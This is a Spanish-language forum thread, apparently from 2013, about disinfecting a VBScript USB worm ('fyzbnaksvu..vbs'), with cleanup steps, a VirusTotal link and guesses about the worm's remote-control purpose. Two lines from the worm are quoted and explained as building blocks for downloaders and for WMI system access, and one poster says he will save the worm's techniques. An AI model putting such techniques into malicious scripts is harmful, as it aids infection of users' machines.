Bueno, lo del virus en la carpeta de inicio lo dejo a tu criterio. Personalmente yo prefiero borrar todo rastro y referencia al virus, no vaya a ser la de malas. Uso "CCleaner" para borrar la entrada de registro correspondiente y que ya no aparezca mas (En CCleaner te vas a "Herramientas" y luego a "Inicio" seleccionas la referencia al virus y das click en "borrar") ya que no esté, le das una limpieza a Windows en el boton "Limpiador" y luego una o dos limpiezas al registro en el botón "Registro" y al siguiente reinicio todo deberia estar mas que bien. Si estos pasos fueron hechos y ves que los accesos directos ya no aparecen, ya no deberian infectarse memorias sanas, pero hay que tener cuidado al abrir memorias de todos modos, nunca sabemos cuando una memoria fue infectada, hasta que es tarde. Con respecto a lo de los efectos secundarios, te seré sincero, fue ||MadAntrax|| quien desentrañó y analizó el código, asi como tambien es el autor del código de desinfección, pero a lo que pude entender, permite a un usuario remoto tomar control de tu PC ¿Con que fin? no tengo idea, posiblemente tener estadistcas de que sitios visitas, vigilar tu ingreso a sitios, o convertir tu computadora en un "zombie" para ejecutar ataques DDoS. (tengo idea de que es la ultima de estas) hasta donde pude entender analizando el código de desinfeccion (aclaro: no soy bueno para analizar códigos de otros) este se encarga de retirar la amenaza quitando el programa escucha de tu maquina, por lo tanto si se envia una orden de la maquina remota, no tendrias porque preocuparte ya que tu maquina no está escuchando tal comando. Espero poder haber aclarado tus dudas, cualquier otra cosa, aqui ando n_n Saludos!
Título: Re: [RESUELTO] Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: Dai101 en 24 Octubre 2013, 04:24 am
Hola.
He estado siguiendo este tema por varios dias ya que esta infeccion esta desatada en las PC's de mi localidad e incluso algunas de las de mi negocio. Buscando mas informacion me encontre con este analisis de la pagina de Virustotal:
https://www.virustotal.com/es/file/21766d68bbe4b790e66a4bc138ce0096660705b9ba76c436b078b65e880ebb03/analysis/
Como pueden ver no todos los AV's lo reconocen, pero algunos si. Asi que recomiendo a los afectados conseguirse algun AV de los que si lo reconocen a fin de eliminar esta amenaza.
Saludos y gracias por la info proporcionada en este tema.
Título: Re: [RESUELTO] Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: danny920825 en 25 Octubre 2013, 07:31 am
Hola a todos, gracias por el post, no soy un afectado, pero soy un interesado, puesto que como he dicho en otros post, estos "virus" traen consigo codigos que no vienen en los manuales, asi como los analisis son magnificos al menos a mi nivel. De ser posible, alguien podria explicarme como funciona este objeto: set httpobj = createobject("msxml2.xmlhttp") y tambien set objwmiservice = getobject("winmgmts:\\.\root\cimv2") porque ||MadAntrax|| me dio algo al respecto en otro codigo pero no entendi, me quedé mas perdido que Adan y Eva el dia de las Madres. Gracias por adelantado Por cierto: ||MadAntrax|| por lo que veo o vives de la programacion o tienes mucho conocimiento, asi que agradezco cada uno de tus aportes aunke no lo diga en todos, si leo lo que escribes y trato de entenderlo, pongo de mi parte, con respecto al codigo pude analizar la mayor parte del codigo de desinfeccion, pero hay cosas que aun desconozco, gracias por el aporte
Título: Re: [RESUELTO] Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: Mad Antrax en 25 Octubre 2013, 08:27 am
Hola a todos, gracias por el post, no soy un afectado, pero soy un interesado, puesto que como he dicho en otros post, estos "virus" traen consigo codigos que no vienen en los manuales, asi como los analisis son magnificos al menos a mi nivel. De ser posible, alguien podria explicarme como funciona este objeto: set httpobj = createobject("msxml2.xmlhttp") y tambien set objwmiservice = getobject("winmgmts:\\.\root\cimv2") porque ||MadAntrax|| me dio algo al respecto en otro codigo pero no entendi, me quedé mas perdido que Adan y Eva el dia de las Madres. Gracias por adelantado Por cierto: ||MadAntrax|| por lo que veo o vives de la programacion o tienes mucho conocimiento, asi que agradezco cada uno de tus aportes aunke no lo diga en todos, si leo lo que escribes y trato de entenderlo, pongo de mi parte, con respecto al codigo pude analizar la mayor parte del codigo de desinfeccion, pero hay cosas que aun desconozco, gracias por el aporte El primer código crea un objeto llamado msxml2.xmlhttp, dicho objeto permite acceder a distintas funciones, entre ellas se encuentra la posibilidad de abrir una página web y leer su contenido. Es útil para descargar fichero por internet (un downloader por ejemplo) o para leer una web en la que hay comandos. Las posibilidades son infinitas. El segundo código se conecta al WMI de windows (http://en.wikipedia.org/wiki/Windows_Management_Instrumentation ). Si alguien se quiere iniciar en el mundo de los script's WMI puede empezar con la mejor herramienta por parte de Scripting Guy: http://www.microsoft.com/en-us/download/details.aspx?id=12028 Los scripts WMI te permiten tener acceso a distintas partes de un SO; incluso para hacer consultas tanto del software como del hardware del PC. Saludos :) PD: No soy programador, aunque es uno de mis hobbies
Título: Re: [RESUELTO] Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: 79137913 en 25 Octubre 2013, 14:05 pm
HOLA!!!
Me gustaron un par de tecnicas que usa, lo voy a guardar!
GRACIAS POR LEER!!!
Título: Re: [RESUELTO] Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: danny920825 en 25 Octubre 2013, 16:31 pm
El primer código crea un objeto llamado msxml2.xmlhttp, dicho objeto permite acceder a distintas funciones, entre ellas se encuentra la posibilidad de abrir una página web y leer su contenido. Es útil para descargar fichero por internet (un downloader por ejemplo) o para leer una web en la que hay comandos. Las posibilidades son infinitas.
El segundo código se conecta al WMI de windows (http://en.wikipedia.org/wiki/Windows_Management_Instrumentation ). Si alguien se quiere iniciar en el mundo de los script's WMI puede empezar con la mejor herramienta por parte de Scripting Guy: http://www.microsoft.com/en-us/download/details.aspx?id=12028
Los scripts WMI te permiten tener acceso a distintas partes de un SO; incluso para hacer consultas tanto del software como del hardware del PC.
Saludos :)
PD: No soy programador, aunque es uno de mis hobbies
uff, cada ves k veo estas cosas, veo k me falta un mun2 por aprender sobre los objetos y funciones de vbs. la mitad de esas cosas no vienen ni en el tuto de esta web ni en los archivos de ayuda k he descargado, como hay k estudiar para aprender caballero!!!!
Título: Re: [RESUELTO] Infeccion de USB y equipo por "fyzbnaksvu..vbs"
Publicado por: 79137913 en 25 Octubre 2013, 17:58 pm
HOLA!!!
Me hace recordar a mi DoOrders.VBS :
http://foro.elhacker.net/buscador-t377862.0.html
Mad si podes echale un ojo ;)
GRACIAS POR LEER!!!
|